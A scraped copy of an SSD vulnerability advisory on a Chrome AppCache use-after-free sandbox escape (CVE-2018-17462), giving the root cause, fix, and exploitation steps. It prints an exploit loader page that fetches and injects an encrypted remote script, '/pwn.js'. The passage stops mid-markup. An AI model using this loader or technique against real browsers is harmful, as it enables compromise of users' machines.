{"id":13714,"date":"2018-10-29T14:19:14","date_gmt":"2018-10-29T22:19:14","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7481\/"},"modified":"2018-10-29T14:19:14","modified_gmt":"2018-10-29T22:19:14","slug":"news-7481","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7481\/","title":{"rendered":"SSD Advisory \u2013 Chrome AppCache Subsystem SBX by utilizing a Use After Free"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:23:16 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The vulnerability exists in the AppCache subsystem in Chrome versions 69.0 and earlier. This code is located in the privileged browser process, outside of the sandbox. The renderer interacts with this subsystem by sending IPC messages to the browser process. These messages can cause the browser to make network requests, which are also attacker-controlled and influence the behavior of the code.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vendor has fixed the issue in Google Chrome version 70.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-17462<\/p>\n<p><strong>Credit<\/strong><br \/> Independent security researchers Ned Williamson and\u00a0Niklas Baumstark reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> Google Chrome versions 69.0 and earlier.<br \/> <span id=\"more-3786\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> The vulnerability exists in the AppCache subsystem in Chrome. The buggy code is reachable via IPC messages from the renderer process to the broker process. AppCache is a reference-counted object. 
It is possible to trigger the <strong>RemoveCache<\/strong> function while the object is being destroyed, thus incrementing the reference count of the freed object by N.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis.png\" data-slb-active=\"1\" data-slb-asset=\"198103742\" data-slb-internal=\"0\" data-slb-group=\"3786\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3787\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-300x130.png\" alt=\"\" width=\"1188\" height=\"515\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-300x130.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-768x334.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-1024x445.png 1024w\" sizes=\"auto, (max-width: 1188px) 100vw, 1188px\" \/><\/a><\/p>\n<p>Notice that <strong><em>newest_complete_cache<\/em><\/strong> is the object being destroyed. A fix is possible by calling <strong><em>CancelUpdate<\/em><\/strong> after setting newest_complete_cache to NULL.<\/p>\n<p>Further exploitation is achieved by decrementing an object&#8217;s reference count to 0. Once a reference to the object is taken and then destroyed, the reference count reaches 0 and the object is freed, thus creating a stronger use-after-free. (Should this be called type confusion?)<\/p>\n<p><strong>Exploit<\/strong><br \/> This bug provides us with two essential primitives: use-after-free decrement-by-N of the first dword of the freed object, where N is controlled. 
If, in the process of decrementing, the first dword reaches 0, the AppCache destructor is called and the pointer is freed.<\/p>\n<p>We use these primitives in two stages: first, to construct a leak, and second, to trigger code execution. The freed AppCache object is 0xA0 bytes in size. We found that <code>net::CanonicalCookie<\/code> has the same size, so we can spray cookies in the browser process by making a network request and including cookies in the response.<\/p>\n<p><code>std::string name<\/code> is the first member of CanonicalCookie. This name is the key from the key\/value pair <code>name=value<\/code> in the cookie string. In the Windows STL, the first qword of a std::string object is a pointer to the string data. By using decrement-by-N, we leak a number of bytes by reading the cookie back from the browser and scanning the <code>name<\/code> field. This leak gives us a heap address, which allows us to spray the heap and predictably place controlled data at a now-known address.<\/p>\n<p>To achieve code execution, we produce a single dangling reference to a freed AppCache via the described vulnerability. We reclaim it with a blob of the same size, forging a reference count of 1 and a fake AppCacheGroup with reference count 0. 
Once we remove the dangling reference and enter the AppCache destructor, the else branch of the RemoveCache method will cause the AppCacheGroup to be freed due to its reference count going from 0 to 1 and back to 0.<\/p>\n<pre><code>void AppCacheGroup::RemoveCache(AppCache* cache) {\n  DCHECK(cache-&gt;associated_hosts().empty());\n  if (cache == newest_complete_cache_) {\n    \/\/ &#8230;\n  } else {\n    scoped_refptr&lt;AppCacheGroup&gt; protect(this);\n    \/\/ &#8230;\n  }\n}<\/code><\/pre>\n<p>The AppCacheGroup destructor in turn performs a virtual call, which we fully control.<\/p>\n<pre><code>AppCacheGroup::~AppCacheGroup() {\n  \/\/ &#8230;\n  if (update_job_)\n    delete update_job_; \/\/ &lt;- code execution here\n}<\/code><\/pre>\n<p>Due to the once-per-boot ASLR approach of Windows, all modules are loaded at the same address in the renderer and broker process. We use a gadget from __longjmp_internal to bootstrap the ROP. 
From there we can either jump to shellcode or open notepad.<\/p>\n<div id=\"crayon-5bd7876214502952761154\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; 
-webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">&lt;head&gt;\n&lt;title&gt;owning, please wait...&lt;\/title&gt;\n&lt;style&gt;\nbody{background:white;font-size:0.8em;}\ndocument{background:white;}\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;pre id=&quot;progress&quot;&gt;&lt;\/pre&gt;\n&lt;pre id=&quot;progress-rce&quot;&gt;&lt;\/pre&gt;\n&lt;pre id=&quot;progress-infoleak&quot;&gt;&lt;\/pre&gt;\n&lt;pre id=&quot;progress-rip&quot;&gt;&lt;\/pre&gt;\n\n\n&lt;script src=&quot;crypto\/BigInteger.js&quot;&gt;&lt;\/script&gt;\n&lt;script src=&quot;crypto\/aes.js&quot;&gt;&lt;\/script&gt;\n\n&lt;script&gt;\nprint = alert;\n\nvar g = bigInt(&quot;115740200527109164239523414760926155534485715860090261532154107313946218459149402375178179458041461723723231563839316251515439564315555249353831328479173170684416728715378198172203100328308536292821245983596065287318698169565702979765910089654821728828592422299160041156491980943427556153020487552135890973413&quot;);\nvar p = bigInt(&quot;124325339146889384540494091085456630009856882741872806181731279018491820800119460022367403769795008250021191767583423221479185609066059226301250167164084041279837566626881119772675984258163062926954046545485368458404445166682380071370274810671501916789361956272226105723317679562001235501455748016154805420913&quot;);\nvar bits = 1024;\n\nvar algo = {\n    'name': 'AES-CBC',\n    'iv': new Uint8Array(16),\n};\n\nfunction rand(bits) {\n    var a = new Uint8Array(Math.ceil(bits \/ 8));\n    window.crypto.getRandomValues(a);\n    var digits = [];\n    a.forEach((x) =&gt; digits.push(bigInt(x)));\n    return bigInt.fromArray(digits, 256, false);\n}\n\nasync function aesDecrypt(s, cipher) {\n    var bytes = new Uint8Array(s.toArray(256).value\n        .map((x) =&gt; 0^x.toString()).slice(0, 16));\n\n    if (typeof crypto.subtle !== 'undefined') {\n        var key = await window.crypto.subtle.importKey(\n            'raw', bytes, algo, false, ['decrypt', 'encrypt']);\n        var plain = await window.crypto.subtle.decrypt(algo, key, cipher);\n    } else {\n        var aes = new aesjs.ModeOfOperation.cbc(bytes, algo.iv);\n        var plain = aes.decrypt(cipher);\n        var padLen = plain[plain.length - 1];\n        plain = plain.slice(0, plain.length - padLen);\n    }\n    return plain;\n}\n\nasync function fetchDH(url, ascii = true) {\n    var a = rand(bits);\n    var A = g.modPow(a, p);\n    var res = await (await fetch(url + '?x=' + A.toString())).json();\n    var B = bigInt(res.B);\n    var s = B.modPow(a, p);\n    var cipher = new Uint8Array(res.result);\n    var buf = await aesDecrypt(s, cipher);\n    if (ascii)\n        return String.fromCharCode.apply(null, new Uint8Array(buf));\n    else\n        return buf;\n}\n\nasync function go_enc() {\n    var js = await fetchDH('\/pwn.js');\n    var el = document.createElement('script');\n    el.innerHTML = js;\n    document.body.appendChild(el);\n}\n\nasync function go_plain() {\n    var el = document.createElement('script');\n    el.setAttribute('src', '\/pwn.js');\n    document.body.appendChild(el);\n}\n\n&lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bigInt<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">digits<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-35\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-37\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">aesDecrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">value<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bd7876214502952761154-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">map<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">slice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">typeof<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">subtle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'undefined'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-42\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">subtle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">importKey<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'raw'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'decrypt'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'encrypt'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span 
class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">subtle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aesjs<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ModeOfOperation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cbc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-47\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aes<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padLen<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">slice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padLen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-52\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-53\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-54\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fetchDH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ascii<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">g<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">modPow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-e\">fetch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'?x='<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">json<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">B<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">B<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">B<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">modPow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-e\">aesDecrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ascii<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">fromCharCode<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">apply<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5bd7876214502952761154-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-66\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-68\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go_enc<\/span><span 